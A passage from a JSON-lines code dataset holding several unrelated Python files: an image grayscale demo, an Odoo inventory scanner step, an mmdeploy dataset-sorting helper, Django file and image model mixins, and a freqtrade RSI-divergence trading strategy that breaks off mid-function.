0].imshow(image)\naxarr[0, 0].set_title('Image Color')\n\naxarr[0, 1].imshow(image_gray,cmap = plt.get_cmap('gray'))\naxarr[0, 1].set_title('Image converted to Gray')\n\naxarr[1, 0].imshow(image_gray_dir,cmap = plt.get_cmap('gray'))\naxarr[1, 0].set_title('Image directly read to gray')\n\nplt.show() \n\n\n# Additional. Experiment on the operation\n# temp = np.array([[[1,2,3],[4,5,6],[7,8,9]],[[1,2,3],[4,5,6],[7,8,9]],[[1,2,3],[4,5,6],[7,8,9]] ])\n# print temp.shape\n# print temp[0,...,:3]","repo_name":"JaeDukSeo/Python_Basic_Image_Processing","sub_path":"2_Gray_Scale/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"74370325927","text":"# flake8: noqa\n# Use <m> or <message> to retrieve the data transmitted by the scanner.\n# Use <t> or <terminal> to retrieve the running terminal browse record.\n# Put the returned action code in <act>, as a single character.\n# Put the returned result or message in <res>, as a list of strings.\n# Put the returned value in <val>, as an integer\n\nterminal.write({'tmp_val5': ''})\nproduct = env['product.product'].browse(int(terminal.tmp_val2))\ninv_line = env['stock.inventory.line'].browse(int(terminal.tmp_val3))\n\nres = [\n _('Product: %s') % (product.display_name),\n ]\nif product.uom_id == env.ref('product.product_uom_unit'):\n qty_int = True\nelse:\n qty_int = False\n res.append(_('UNIT OF MEASURE: %s') % product.uom_id.name)\ntheoric_qty_display = qty_int and int(inv_line.theoretical_qty) or inv_line.theoretical_qty\nres.append(_('Theoric qty: %s') % theoric_qty_display)\ncur_qty_display = qty_int and int(inv_line.product_qty) or inv_line.product_qty\nres.append(_('QTY ALREADY INVENTORIED: %s') % cur_qty_display)\n\nact = 'C'\nres += [\n '',\n (_('Do you want to ADD to the already inventoried qty?')),\n '',\n (_('If you answer no, you will enter a new inventory qty.')),\n ]\n","repo_name":"akretion/stock-scanner-scenario","sub_path":"stock_scanner_inventory_generic/data/scanner_scenario_step_inventory_already_inventoried_option.py","file_name":"scanner_scenario_step_inventory_already_inventoried_option.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920920791","text":"from torch.utils.data import Dataset\n\n\ndef is_can_sort_dataset(dataset: Dataset) -> bool:\n \"\"\"Checking for the possibility of sorting the dataset by fields 'height'\n and 'width'.\n\n Args:\n dataset (Dataset): The dataset.\n\n Returns:\n bool: Is it possible or not to sort the dataset.\n \"\"\"\n is_sort_possible = \\\n hasattr(dataset, 'data_infos') and \\\n dataset.data_infos and \\\n all(key in dataset.data_infos[0] for key in ('height', 'width'))\n return is_sort_possible\n\n\ndef sort_dataset(dataset: Dataset) -> Dataset:\n \"\"\"Sorts the dataset by image height and width.\n\n Args:\n dataset (Dataset): The dataset.\n\n Returns:\n Dataset: Sorted dataset.\n \"\"\"\n sort_data_infos = sorted(\n dataset.data_infos, key=lambda e: (e['height'], e['width']))\n sort_img_ids = [e['id'] for e in sort_data_infos]\n dataset.data_infos = sort_data_infos\n dataset.img_ids = sort_img_ids\n return dataset\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"23144349817","text":"import os\n\nfrom django.db import models\n\nfrom moviepy import editor as mpy\nfrom django.conf import settings\n\nfrom django.core.validators import (\n MaxLengthValidator,\n MinLengthValidator,\n FileExtensionValidator\n)\nfrom safedelete import SOFT_DELETE_CASCADE\nfrom safedelete.models import SafeDeleteModel\n\nfrom painless.utils.upload.path import (\n date_directory_path\n)\n\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Sku_Mixin(models.Model):\n sku = models.CharField(\n max_length=255,\n editable=False,\n unique=True,\n )\n\n class Meta:\n abstract = True\n\n\nclass TitleSlugLinkModelMixin(models.Model):\n title = models.CharField(\n _(\"Title\"),\n max_length=150,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ],\n unique=True\n )\n slug = models.SlugField(\n _(\"Slug\"),\n editable=False,\n allow_unicode=True,\n max_length=150,\n unique=True\n )\n\n class Meta:\n abstract = True\n\n\nclass TimeStampModelMixin(models.Model):\n created = models.DateTimeField(\n _(\"Created\"),\n auto_now_add=True\n )\n modified = models.DateTimeField(\n _(\"Modified\"),\n auto_now=True\n )\n\n class Meta:\n abstract = True\n\n\nclass DeletedAtMixin(models.Model):\n deleted_at = models.DateTimeField(\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass SVGMixin(models.Model):\n svg = models.FileField(\n _(\"SVG\"),\n upload_to=date_directory_path,\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['svg', 'SVG'])]\n )\n\n svg_alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n\n class Meta:\n abstract = True\n\n\nclass WightSVGMixin(models.Model):\n wight_svg = models.FileField(\n _(\"Wight SVG\"),\n upload_to=date_directory_path,\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['svg', 'SVG'])]\n )\n\n wight_svg_alternate_text = models.CharField(\n _(\"Wight Svg Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n\n class Meta:\n abstract = True\n\n\nclass ImageMixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 'PNG', 'jpg', 'jpeg', 'png'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n @property\n def file_name(self):\n if self.picture:\n image_name = os.path.basename(\n '{}{}'.format(settings.BASE_DIR,\n self.picture.url.replace('/media', '/media/upload'))\n )\n return image_name\n else:\n return None\n\n @property\n def file_size(self):\n if self.picture:\n image = os.stat(\n '{}{}'.format(settings.BASE_DIR,\n self.picture.url.replace('/media', '/media/upload')))\n return image.st_size\n else:\n return 0\n\n\nclass ImageNullableMixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 'PNG', 'jpg', 'jpeg', 'png'])],\n null=True,\n blank=True\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ],\n null=True,\n blank=True\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False,\n null=True,\n blank=True\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False,\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass ImagePNG_Mixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['PNG', 'png'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass ImageJPG_Mixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['JPG', 'JPEG', 'jpg', 'jpeg'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass VideoMP4_Mixin(models.Model):\n video = models.FileField(\n _(\"Video\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['mp4', ])]\n )\n\n video_duration = models.FloatField(\n _(\"VideoDuration\"),\n default=0.0,\n blank=True,\n help_text=\"NOTE: seconds\"\n )\n\n class Meta:\n abstract = True\n\n @property\n def get_video_duration(self):\n if self.video:\n video = mpy.VideoFileClip(\n '{}{}'.format(settings.BASE_DIR,\n self.video.url.replace('/media', '/media/upload')))\n return video.duration\n else:\n return 0\n\n\nclass VideoNullableMP4_Mixin(models.Model):\n video = models.FileField(\n _(\"Video\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['mp4', ])],\n null=True, blank=True\n )\n\n video_duration = models.FloatField(\n _(\"VideoDuration\"),\n default=0.0,\n blank=True,\n help_text=\"NOTE: seconds\"\n )\n\n class Meta:\n abstract = True\n\n @property\n def get_video_duration(self):\n if self.video:\n video = mpy.VideoFileClip(\n '{}{}'.format(settings.BASE_DIR,\n self.video.url.replace('/media', '/media/upload')))\n return video.duration\n else:\n return 0\n\n\nclass PremiumMixin(models.Model):\n METHODS = (\n ('f', _('Freemium')),\n ('Z', _('Zarin')),\n )\n\n payment_method = models.CharField(\n _(\"Payment Method\"),\n choices=METHODS,\n max_length=1,\n default='f'\n )\n\n class Meta:\n abstract = True\n\n\nclass LevelMixin(models.Model):\n LEVELS = (\n ('b', _('Basic')),\n ('i', _('Intermediate')),\n ('a', _('Advance')),\n ('p', _('Professional')),\n )\n\n level = models.CharField(\n _(\"Level\"),\n choices=LEVELS,\n max_length=1,\n default='b'\n )\n\n class Meta:\n abstract = True\n\n\nclass CoverMixin(models.Model):\n cover = models.ImageField(\n _(\"Cover\"),\n upload_to=date_directory_path,\n height_field='cover_height_field',\n width_field='cover_width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 'PNG', 'jpg', 'jpeg', 'png'])]\n )\n\n cover_alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n cover_width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n cover_height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass PDFModelMixin(models.Model):\n pdf = models.FileField(\n _(\"Pdf File\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['pdf', 'PDF'])],\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass SafeDeleteModelMixin(SafeDeleteModel):\n _safedelete_policy = SOFT_DELETE_CASCADE\n\n class Meta:\n abstract = True\n","repo_name":"mehran-rahmanzadeh/saqr-backend","sub_path":"painless/utils/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":9774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73896314408","text":"# --- Do not remove these libs ---\r\nfrom freqtrade.strategy.interface import IStrategy\r\nfrom typing import Dict, List\r\nfrom functools import reduce\r\nfrom pandas import DataFrame\r\n# --------------------------------\r\n\r\nimport talib.abstract as ta\r\nimport numpy as np\r\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\r\nimport datetime\r\nfrom technical.util import resample_to_interval, resampled_merge\r\nfrom datetime import datetime, timedelta\r\nfrom freqtrade.persistence import Trade\r\nfrom freqtrade.strategy import stoploss_from_open, merge_informative_pair, DecimalParameter, IntParameter, CategoricalParameter\r\nimport technical.indicators as ftt\r\n\r\n\r\n#Divergence variables\r\nrangeUpper = 60\r\nrangeLower = 5\r\n\r\n# Buy hyperspace params:\r\nbuy_params = {\r\n \"antipump_threshold\": 0.257,\r\n \"base_nb_candles_buy\": 14,\r\n \"ewo_high\": 2.327,\r\n \"ewo_high_2\": -2.327,\r\n \"ewo_low\": -20.988,\r\n \"low_offset\": 0.975,\r\n \"low_offset_2\": 0.955,\r\n \"rsi_buy\": 40,\r\n\r\n #SMAOffsetProtectOptV1\r\n \"base_nb_candles_buy2\": 16,\r\n \"ewo_high2\": 5.638,\r\n \"ewo_low2\": -19.993,\r\n \"low_offset2\": 0.978,\r\n \"rsi_buy2\": 61,\r\n}\r\n\r\n# Sell hyperspace params:\r\nsell_params = {\r\n \"base_nb_candles_sell\": 24,\r\n \"high_offset\": 0.991,\r\n \"high_offset_2\": 0.997,\r\n #SMAOffsetProtectOptV1\r\n \"base_nb_candles_sell2\": 49,\r\n \"high_offset2\": 1.006, \"cstp_bail_how\": \"roc\",\r\n #####\r\n \"cstp_bail_roc\": -0.032,\r\n \"cstp_bail_time\": 1108,\r\n \"cstp_bb_trailing_input\": \"bb_lowerband_neutral_inf\",\r\n \"cstp_threshold\": -0.036,\r\n \"cstp_trailing_max_stoploss\": 0.054,\r\n \"cstp_trailing_only_offset_is_reached\": 0.06,\r\n \"cstp_trailing_stop_profit_devider\": 2,\r\n \"droi_pullback\": True,\r\n \"droi_pullback_amount\": 0.03,\r\n \"droi_pullback_respect_table\": False,\r\n \"droi_trend_type\": \"any\",\r\n}\r\n\r\n\r\n\r\n\r\nclass custom(IStrategy):\r\n INTERFACE_VERSION = 2\r\n\r\n # Modified ROI - 20210620\r\n # ROI table:\r\n minimal_roi = {\r\n \"0\": 0.028,\r\n \"10\": 0.018,\r\n \"30\": 0.010,\r\n \"40\": 0.005\r\n }\r\n\r\n\r\n custom_trade_info = {}\r\n\r\n # Stoploss:\r\n stoploss = -0.11\r\n\r\n antipump_threshold = DecimalParameter(0, 0.4, default=0.25, space='buy', optimize=True)\r\n\r\n # SMAOffset\r\n base_nb_candles_buy = IntParameter(5, 80, default=buy_params['base_nb_candles_buy'], space='buy', optimize=True)\r\n base_nb_candles_sell = IntParameter(5, 80, default=sell_params['base_nb_candles_sell'], space='sell', optimize=True)\r\n low_offset = DecimalParameter(0.9, 0.99, default=buy_params['low_offset'], space='buy', optimize=True)\r\n low_offset_2 = DecimalParameter(0.9, 0.99, default=buy_params['low_offset_2'], space='buy', optimize=True)\r\n high_offset = DecimalParameter(0.95, 1.1, default=sell_params['high_offset'], space='sell', optimize=True)\r\n high_offset_2 = DecimalParameter(0.99, 1.5, default=sell_params['high_offset_2'], space='sell', optimize=True)\r\n\r\n #SMAOffsetProtectOptV1\r\n low_offset2 = DecimalParameter(0.9, 0.99, default=buy_params['low_offset2'], space='buy', optimize=True)\r\n base_nb_candles_buy2 = IntParameter(5, 80, default=buy_params['base_nb_candles_buy2'], space='buy', optimize=True)\r\n base_nb_candles_sell2 = IntParameter(5, 80, default=sell_params['base_nb_candles_sell'], space='sell', optimize=True)\r\n high_offset2 = DecimalParameter(0.95, 1.1, default=sell_params['high_offset'], space='sell', optimize=True)\r\n\r\n # Protection\r\n fast_ewo = 50\r\n slow_ewo = 200\r\n ewo_low = DecimalParameter(-20.0, -8.0, default=buy_params['ewo_low'], space='buy', optimize=True)\r\n ewo_high = DecimalParameter(2.00, 12.0, default=buy_params['ewo_high'], space='buy', optimize=True)\r\n ewo_high_2 = DecimalParameter(-6.0, 12.0, default=buy_params['ewo_high_2'], space='buy', optimize=True)\r\n rsi_buy = IntParameter(30, 70, default=buy_params['rsi_buy'], space='buy', optimize=True)\r\n\r\n #SMAOffsetProtectOptV1\r\n ewo_low2 = DecimalParameter(-20.0, -8.0, default=buy_params['ewo_low2'], space='buy', optimize=True)\r\n ewo_high2 = DecimalParameter(2.0, 12.0, default=buy_params['ewo_high2'], space='buy', optimize=True)\r\n rsi_buy2 = IntParameter(30, 70, default=buy_params['rsi_buy2'], space='buy', optimize=True)\r\n\r\n # Trailing stop:\r\n trailing_stop = False\r\n #trailing_stop_positive = 0.005\r\n #trailing_stop_positive_offset = 0.03\r\n #trailing_only_offset_is_reached = True\r\n\r\n # Sell signal\r\n use_sell_signal = False\r\n sell_profit_only = False\r\n sell_profit_offset = 0.01\r\n ignore_roi_if_buy_signal = False\r\n\r\n # Optimal timeframe for the strategy\r\n timeframe = '5m'\r\n informative_timeframe = '1h'\r\n\r\n process_only_new_candles = True\r\n startup_candle_count: int = 100\r\n\r\n plot_config = {\r\n 'main_plot': {\r\n 'ma_buy': {'color': 'orange'},\r\n 'ma_sell': {'color': 'orange'},\r\n },\r\n }\r\n # Strategy Specific Variable Storage\r\n custom_trade_info = {}\r\n\r\n\r\n def informative_pairs(self):\r\n\r\n pairs = self.dp.current_whitelist()\r\n informative_pairs = [(pair, self.informative_timeframe) for pair in pairs]\r\n\r\n return informative_pairs\r\n\r\n def get_informative_indicators(self, metadata: dict):\r\n\r\n dataframe = self.dp.get_pair_dataframe(\r\n pair=metadata['pair'], timeframe=self.informative_timeframe)\r\n\r\n return dataframe\r\n\r\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n\r\n len = 14\r\n src = dataframe['close']\r\n lbL = 10 #5\r\n dataframe['osc'] = ta.RSI(src, len)\r\n dataframe['osc'] = dataframe['osc'].fillna(0)\r\n\r\n # plFound = na(pivotlow(osc, lbL, lbR)) ? false : true\r\n dataframe['min'] = dataframe['osc'].rolling(lbL).min()\r\n dataframe['prevMin'] = np.where(dataframe['min'] > dataframe['min'].shift(), dataframe['min'].shift(), dataframe['min'])\r\n dataframe.loc[\r\n (dataframe['osc'] == dataframe['prevMin'])\r\n , 'plFound'] = 1\r\n dataframe['plFound'] = dataframe['plFound'].fillna(0)\r\n\r\n # phFound = na(pivothigh(osc, lbL, lbR)) ? false : true\r\n dataframe['max'] = dataframe['osc'].rolling(lbL).max()\r\n dataframe['prevMax'] = np.where(dataframe['max'] < dataframe['max'].shift(), dataframe['max'].shift(), dataframe['max'])\r\n dataframe.loc[\r\n (dataframe['osc'] == dataframe['prevMax'])\r\n , 'phFound'] = 1\r\n dataframe['phFound'] = dataframe['phFound'].fillna(0)\r\n\r\n\r\n #------------------------------------------------------------------------------\r\n # Regular Bullish\r\n # Osc: Higher Low\r\n # oscHL = osc[lbR] > valuewhen(plFound, osc[lbR], 1) and _inRange(plFound[1])\r\n dataframe['valuewhen_plFound_osc'], dataframe['inrange_plFound_osc'] = valuewhen(dataframe, 'plFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] > dataframe['valuewhen_plFound_osc']) &\r\n (dataframe['inrange_plFound_osc'] == 1)\r\n )\r\n , 'oscHL'] = 1\r\n\r\n # Price: Lower Low\r\n # priceLL = low[lbR] < valuewhen(plFound, low[lbR], 1)\r\n dataframe['valuewhen_plFound_low'], dataframe['inrange_plFound_low'] = valuewhen(dataframe, 'plFound', 'low', 1)\r\n dataframe.loc[\r\n (dataframe['low'] < dataframe['valuewhen_plFound_low'])\r\n , 'priceLL'] = 1\r\n #bullCond = plotBull and priceLL and oscHL and plFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceLL'] == 1) &\r\n (dataframe['oscHL'] == 1) &\r\n (dataframe['plFound'] == 1)\r\n )\r\n , 'bullCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Hidden Bullish\r\n # // Osc: Lower Low\r\n #\r\n # oscLL = osc[lbR] < valuewhen(plFound, osc[lbR], 1) and _inRange(plFound[1])\r\n dataframe['valuewhen_plFound_osc'], dataframe['inrange_plFound_osc'] = valuewhen(dataframe, 'plFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] < dataframe['valuewhen_plFound_osc']) &\r\n (dataframe['inrange_plFound_osc'] == 1)\r\n )\r\n , 'oscLL'] = 1\r\n #\r\n # // Price: Higher Low\r\n #\r\n # priceHL = low[lbR] > valuewhen(plFound, low[lbR], 1)\r\n dataframe['valuewhen_plFound_low'], dataframe['inrange_plFound_low'] = valuewhen(dataframe,'plFound', 'low', 1)\r\n dataframe.loc[\r\n (dataframe['low'] > dataframe['valuewhen_plFound_low'])\r\n , 'priceHL'] = 1\r\n # hiddenBullCond = plotHiddenBull and priceHL and oscLL and plFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceHL'] == 1) &\r\n (dataframe['oscLL'] == 1) &\r\n (dataframe['plFound'] == 1)\r\n )\r\n , 'hiddenBullCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Regular Bearish\r\n # // Osc: Lower High\r\n #\r\n # oscLH = osc[lbR] < valuewhen(phFound, osc[lbR], 1) and _inRange(phFound[1])\r\n dataframe['valuewhen_phFound_osc'], dataframe['inrange_phFound_osc'] = valuewhen(dataframe, 'phFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] < dataframe['valuewhen_phFound_osc']) &\r\n (dataframe['inrange_phFound_osc'] == 1)\r\n )\r\n , 'oscLH'] = 1\r\n #\r\n # // Price: Higher High\r\n #\r\n # priceHH = high[lbR] > valuewhen(phFound, high[lbR], 1)\r\n dataframe['valuewhen_phFound_high'], dataframe['inrange_phFound_high'] = valuewhen(dataframe, 'phFound', 'high', 1)\r\n dataframe.loc[\r\n (dataframe['high'] > dataframe['valuewhen_phFound_high'])\r\n , 'priceHH'] = 1\r\n #\r\n # bearCond = plotBear and priceHH and oscLH and phFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceHH'] == 1) &\r\n (dataframe['oscLH'] == 1) &\r\n (dataframe['phFound'] == 1)\r\n )\r\n , 'bearCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Hidden Bearish\r\n # // Osc: Higher High\r\n #\r\n # oscHH = osc[lbR] > valuewhen(phFound, osc[lbR], 1) and _inRange(phFound[1])\r\n dataframe['valuewhen_phFound_osc'], dataframe['inrange_phFound_osc'] = valuewhen(dataframe, 'phFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] > dataframe['valuewhen_phFound_osc']) &\r\n (dataframe['inrange_phFound_osc'] == 1)\r\n )\r\n , 'oscHH'] = 1\r\n #\r\n # // Price: Lower High\r\n #\r\n # priceLH = high[lbR] < valuewhen(phFound, high[lbR], 1)\r\n dataframe['valuewhen_phFound_high'], dataframe['inrange_phFound_high'] = valuewhen(dataframe, 'phFound', 'high', 1)\r\n dataframe.loc[\r\n (dataframe['high'] < dataframe['valuewhen_phFound_high'])\r\n , 'priceLH'] = 1\r\n #\r\n # hiddenBearCond = plotHiddenBear and priceLH and oscHH and phFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceLH'] == 1) &\r\n (dataframe['oscHH'] == 1) &\r\n (dataframe['phFound'] == 1)\r\n )\r\n , 'hiddenBearCond'] = 1\r\n\r\n # Calculate all ma_buy values\r\n for val in self.base_nb_candles_buy.range:\r\n dataframe[f'ma_buy_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_buy values\r\n for val in self.base_nb_candles_buy2.range:\r\n dataframe[f'ma_buy2_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_sell values\r\n for val in self.base_nb_candles_sell.range:\r\n dataframe[f'ma_sell_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_sell values\r\n for val in self.base_nb_candles_sell2.range:\r\n dataframe[f'ma_sell2_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n dataframe['hma_50'] = qtpylib.hull_moving_average(dataframe['close'], window=50)\r\n dataframe['hma_9'] = qtpylib.hull_moving_average(dataframe['close'], window=9)\r\n dataframe['ema_100'] = ta.EMA(dataframe, timeperiod=100)\r\n\r\n dataframe['sma_9'] = ta.SMA(dataframe, timeperiod=9)\r\n dataframe['ema_9'] = ta.EMA(dataframe, timeperiod=9)\r\n\r\n # Elliot\r\n dataframe['EWO'] = EWO(dataframe, self.fast_ewo, self.slow_ewo)\r\n\r\n #pump stregth\r\n dataframe['zema_30'] = ftt.zema(dataframe, period=30)\r\n dataframe['zema_200'] = ftt.zema(dataframe, period=200)\r\n dataframe['pump_strength'] = (dataframe['zema_30'] - dataframe['zema_200']) / dataframe['zema_30']\r\n\r\n # RSI\r\n dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)\r\n\r\n dataframe['rsi_fast'] = ta.RSI(dataframe, timeperiod=4)\r\n dataframe['rsi_slow'] = ta.RSI(dataframe, timeperiod=20)\r\n\r\n dataframe['rmi'] = RMI(dataframe, length=24, mom=5)\r\n\r\n dataframe['roc'] = dataframe['close'].pct_change(12).rolling(12).max() * 100\r\n\r\n # Base pair informative timeframe indicators\r\n informative = self.dp.get_pair_dataframe(pair=metadata['pair'], timeframe=self.informative_timeframe)\r\n\r\n # Get the \"average day range\" between the 1d high and 1d low to set up guards\r\n informative['1d-high'] = informative['close'].rolling(24).max()\r\n informative['1d-low'] = informative['close'].rolling(24).min()\r\n\r\n dataframe = merge_informative_pair(dataframe, informative, self.timeframe, self.informative_timeframe, ffill=True)\r\n\r\n return dataframe\r\n\r\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dont_buy_conditions = []\r\n\r\n dont_buy_conditions.append(\r\n (dataframe['pump_strength'] > self.antipump_threshold.value) &\r\n (dataframe['bearCond'] < 1) &\r\n (dataframe['hiddenBearCond'] < 1)\r\n )\r\n #\"\"\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] > self.ewo_high.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset_2.value)) &\r\n (dataframe['EWO'] > self.ewo_high_2.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))&\r\n (dataframe['rsi']<25)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] < 35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] < self.ewo_low.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n #\"\"\r\n\r\n #SMAOffsetProtectOptV1\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] > self.ewo_high2.value) &\r\n (dataframe['rsi'] < self.rsi_buy2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] < self.ewo_low2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n\r\n if conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'buy'\r\n ]=1\r\n\r\n if dont_buy_conditions:\r\n for condition in dont_buy_conditions:\r\n dataframe.loc[condition, 'buy'] = 0\r\n\r\n\r\n return dataframe\r\n\r\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dataframe.loc[:, 'sell'] = 0\r\n\r\n \"\"\"\r\n conditions.append(\r\n (\r\n (dataframe['close'] > (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value)) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n conditions.append(\r\n (\r\n (dataframe['close'] > (dataframe[f'ma_sell2_{self.base_nb_candles_sell2.value}'] * self.high_offset2.value)) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n \"\"\"\r\n\r\n if 